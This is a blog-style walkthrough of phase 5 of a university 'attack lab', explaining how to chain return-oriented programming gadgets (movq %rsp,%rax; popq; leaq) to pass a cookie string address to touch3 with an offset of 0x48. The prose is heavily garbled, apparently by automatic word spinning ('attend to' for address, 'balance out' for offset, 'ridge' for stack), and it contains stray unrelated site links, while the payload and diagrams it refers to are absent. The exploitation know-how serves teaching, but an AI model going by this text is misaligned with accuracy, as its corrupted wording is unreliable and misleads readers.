Phase 5: tool Chaining

Now the time because that the final phase. Did you do it gotta be a genius to gain here so go you. Back the spec says that this phase calls for a lot much more effort than the points that worth, it yes, really isn’t as well bad, so nothing be a quitter. Google doesn’t hire quitters.

You are watching: Attack lab phase 3

The basics of this phase space the very same as those of step 3: we need to access touch3 through a cookie wire in %rdi. Once again, we have to worry around offsetting native a known attend to to find a location to keep this cookie string, and also that’s what the majority of this difficulty deals with.Let’s start off by taking a look at the added tools we’ve to be given:


As a evaluation of movl’s impact on the upper bytes that a register, the zeroes lock out, properly ensuring that everything value you’re moving doesn’t get adjusted by a register’s formerly encoded data.Now that time to make a plan to deal with the phase. We understand that we require to add some counter value come the deal with of the top of the buffer. We likewise know the we’ll need to take the string at that location and also move it into %rdi.To begin off, we’ll take a look in ~ the gadgets that have actually been made easily accessible to us. Ns won’t recording the entire device farm here since it’s like 3 frickin’ pages, yet I’ll clip out essential gadgets. The very first thing come take keep in mind of is the special leaq appropriate after the mid_farm marker:


This leaq adds the values of %rdi and also %rsi together and also places their amount in %rax. Together a result, we now have a way to produce our balance out address, and we understand we must place the address and the offset into %rdi and %rsi.Since tools actually take up room in the ridge themselves, we won’t understand the precise offset value till we’ve to adjust our setup out. Let’s start by make the efforts to gain a known deal with into among the it is registered above.The easiest attend to to work on is probably simply the ar of %rsp itself. At the time of execution, the %rsp clues just listed below the buffer, wherein the old return address was. Discovering this, we must look because that a means to relocate %rsp right into %rdi or %rsi. Unfortunately, this rap is average so neither of those exist. As soon as again we’ll look for the next finest thing and move %rsp into another register:


The 48 89 e0 at 40192e is one encoding for movq %rsp, %rax. So currently we have to take a look and also see if we have a method to get the value in %rax right into a it is registered that we want. A couple Ctrl + Fs shows you that, amen hallelujah, us do:


The 48 89 c7 in ~ 4018a5 is an encoding for movq %rax, %rdi. So currently we have actually a known deal with in among the registers us need. The next step is to obtain our offset into the various other register. Of course us don’t recognize what value that balance out is, yet we’ll simply work with the register manipulation and also fill that in later. Presume we’ll have to store the balance out in the ridge somewhere, we have the right to use the same technique from phase 4:


The 58 will location our offset into %rax. Due to the fact that of the method this laboratory is designed, we’ll find that trying to gain this value into %rsi is a significant hassle and leaves girlfriend with:

In the order presented above, we have actually encodings to move %eax into %ecx, %ecx into %edx, and, finally, %edx into %esi. We switch to making use of the lower registers because it’s easier to find the encodings because that them.Now the we have actually the known address and counter in the correct registers, we can apply the leaq to obtain the final deal with into %rax. The last action is to obtain that indigenous %rax come %rdi, using the second gadget from previously in this phase.A native of advice: be careful when you’re composing these solutions under otherwise you’ll finish up staring at the assembly for an hour, wondering how countless puppies girlfriend must’ve killed in a past life to be sentenced to this suffering, when, in reality, you just counted wrong since you’re a college student v the psychological acuity that a first grader. Not speaking from personal experience that course.

See more: Oracion Espiritu Santo Para Todas Las Necesidades

The last step is to find the offset. Creating your systems down very first is really advantageous for this step, however you should end up with an offset of 72 bytes, or 0x48. This pipeline us through a systems that look at like:

Breaking this down right into an overly complicated stack analysis we have the right to see that, once again, we have our default stack structure after gets returns, whereby our buffer overflow has been set up:

Once getbuf returns, the regime will be prepared to access our an initial gadget, which move the resolve of %rsp into %rax:

Now, %rax consists of the resolve of the cell directly below the padding and %rsp has moved come our second gadget, which will move this address from %rax come %rdi:

As we have the right to see, the resolve is currently in %rdi and also the %rsp is all set to access the third gadget, a popq %rax:

After that pop instruction, the balance out (0x48) is now in %rax, and the next few instructions will relocate this value till it’s in %rsi:

Now the our values have actually been required into the correct registers, we’re all set to initiate the leaq accuse to obtain our full address:

The leaq has actually now worked and also the complete offset resolve has to be moved right into %rax. The final device will now move this resolve into %rdi:

The resolve of the cookie string is currently in %rdi, and our routine is finally ready to enter touch3 and also solve the phase.